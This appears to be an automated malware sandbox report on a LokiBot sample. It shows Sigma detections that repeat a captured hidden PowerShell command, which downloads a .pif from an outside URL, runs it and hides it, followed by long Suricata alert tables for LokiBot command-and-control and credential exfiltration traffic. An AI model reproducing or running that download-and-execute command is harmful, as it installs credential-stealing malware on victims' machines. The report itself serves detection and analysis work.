Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:47.526720+0200	2024312	1	A Network Trojan was detected	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:48.453317+0200	2024312	1	A Network Trojan was detected	192.168.2.10	49708	45.149.241.169	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:46.743247+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.608552+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:58.316279+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.297568+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.494707+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.777716+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.684048+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.600648+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.528198+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.423848+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.339146+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.254833+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.163793+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:10.038728+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:11.038525+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:12.097651+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:13.053982+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.963379+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.812196+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.631002+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.618667+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:20.073300+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.894549+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.709486+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.731827+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.541526+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:24.429751+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.256730+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:26.118736+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.897709+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.873598+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.712017+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.654591+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.592777+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:32.603612+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.526238+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.225314+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.182438+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:44.019040+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.999700+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.841003+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.640569+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.539146+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.485570+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:50.351787+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.167462+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:52.087418+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.996562+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:54.039701+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.984252+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.928869+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.209847+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.212197+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.314369+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.225165+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.533864+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.438719+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.295902+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.502964+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.390993+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.289773+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.260240+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.183320+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.428230+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.459230+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.541296+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.323391+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:20.145363+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.992218+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.900606+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.731444+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.590474+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.518060+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.368288+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.207258+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:27.022466+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:28.117331+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.927858+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.746973+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.654397+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.633256+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.759509+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.636826+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.567446+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.412082+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.196016+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.999089+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.869567+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.386731+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.280593+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.10	49809	45.149.241.169	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:31.352609+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49734	TCP
2024-10-03T09:20:31.352609+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49776	TCP
2024-10-03T09:20:31.352609+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49752	TCP
2024-10-03T09:20:31.352609+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49753	TCP
2024-10-03T09:20:31.352609+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49775	TCP
2024-10-03T09:20:56.433087+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49709	TCP
2024-10-03T09:20:58.057510+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49715	TCP
2024-10-03T09:20:59.146093+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49716	TCP
2024-10-03T09:21:00.189299+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49717	TCP
2024-10-03T09:21:01.618178+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49718	TCP
2024-10-03T09:21:03.531218+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49719	TCP
2024-10-03T09:21:04.415995+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49720	TCP
2024-10-03T09:21:05.371100+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49721	TCP
2024-10-03T09:21:06.270016+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49722	TCP
2024-10-03T09:21:07.162168+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49723	TCP
2024-10-03T09:21:08.100420+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49724	TCP
2024-10-03T09:21:09.016619+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49725	TCP
2024-10-03T09:21:09.866203+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49726	TCP
2024-10-03T09:21:10.873454+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49727	TCP
2024-10-03T09:21:11.922869+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49728	TCP
2024-10-03T09:21:12.883774+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49729	TCP
2024-10-03T09:21:13.809511+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49730	TCP
2024-10-03T09:21:14.648261+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49731	TCP
2024-10-03T09:21:15.453200+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49732	TCP
2024-10-03T09:21:17.431251+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49733	TCP
2024-10-03T09:21:19.697873+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49735	TCP
2024-10-03T09:21:20.723425+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49736	TCP
2024-10-03T09:21:21.531766+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49737	TCP
2024-10-03T09:21:22.455429+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49738	TCP
2024-10-03T09:21:23.396516+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49739	TCP
2024-10-03T09:21:24.279091+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49740	TCP
2024-10-03T09:21:25.106678+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49741	TCP
2024-10-03T09:21:25.966662+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49742	TCP
2024-10-03T09:21:26.743539+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49743	TCP
2024-10-03T09:21:27.718153+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49744	TCP
2024-10-03T09:21:28.565618+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49745	TCP
2024-10-03T09:21:29.496599+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49746	TCP
2024-10-03T09:21:30.428216+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49747	TCP
2024-10-03T09:21:31.426744+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49749	TCP
2024-10-03T09:21:33.376905+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49750	TCP
2024-10-03T09:21:35.071224+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49751	TCP
2024-10-03T09:21:43.033644+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49754	TCP
2024-10-03T09:21:43.862811+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49755	TCP
2024-10-03T09:21:44.836889+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49756	TCP
2024-10-03T09:21:45.682178+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49757	TCP
2024-10-03T09:21:46.489748+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49758	TCP
2024-10-03T09:21:47.385173+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49759	TCP
2024-10-03T09:21:48.319408+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49760	TCP
2024-10-03T09:21:49.262105+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49761	TCP
2024-10-03T09:21:51.019960+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49762	TCP
2024-10-03T09:21:51.937810+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49763	TCP
2024-10-03T09:21:52.840992+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49764	TCP
2024-10-03T09:21:53.882422+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49765	TCP
2024-10-03T09:21:54.819508+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49766	TCP
2024-10-03T09:21:55.764891+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49767	TCP
2024-10-03T09:21:57.079321+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49768	TCP
2024-10-03T09:21:58.045547+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49769	TCP
2024-10-03T09:21:59.158748+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49770	TCP
2024-10-03T09:22:00.077875+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49771	TCP
2024-10-03T09:22:01.217841+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49772	TCP
2024-10-03T09:22:02.282362+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49773	TCP
2024-10-03T09:22:03.145936+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49774	TCP
2024-10-03T09:22:10.325677+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49777	TCP
2024-10-03T09:22:11.233316+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49778	TCP
2024-10-03T09:22:12.139820+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49779	TCP
2024-10-03T09:22:13.088045+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49780	TCP
2024-10-03T09:22:14.035809+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49781	TCP
2024-10-03T09:22:15.264706+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49782	TCP
2024-10-03T09:22:16.298895+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49783	TCP
2024-10-03T09:22:18.387415+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49784	TCP
2024-10-03T09:22:19.168785+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49785	TCP
2024-10-03T09:22:19.989579+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49786	TCP
2024-10-03T09:22:20.842773+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49787	TCP
2024-10-03T09:22:21.750540+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49788	TCP
2024-10-03T09:22:22.569891+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49789	TCP
2024-10-03T09:22:23.432070+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49790	TCP
2024-10-03T09:22:24.378030+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49791	TCP
2024-10-03T09:22:25.212158+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49792	TCP
2024-10-03T09:22:26.056641+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49793	TCP
2024-10-03T09:22:26.875901+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49794	TCP
2024-10-03T09:22:27.950982+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49795	TCP
2024-10-03T09:22:28.773427+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49796	TCP
2024-10-03T09:22:29.585337+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49797	TCP
2024-10-03T09:22:30.499155+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49798	TCP
2024-10-03T09:22:31.474479+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49799	TCP
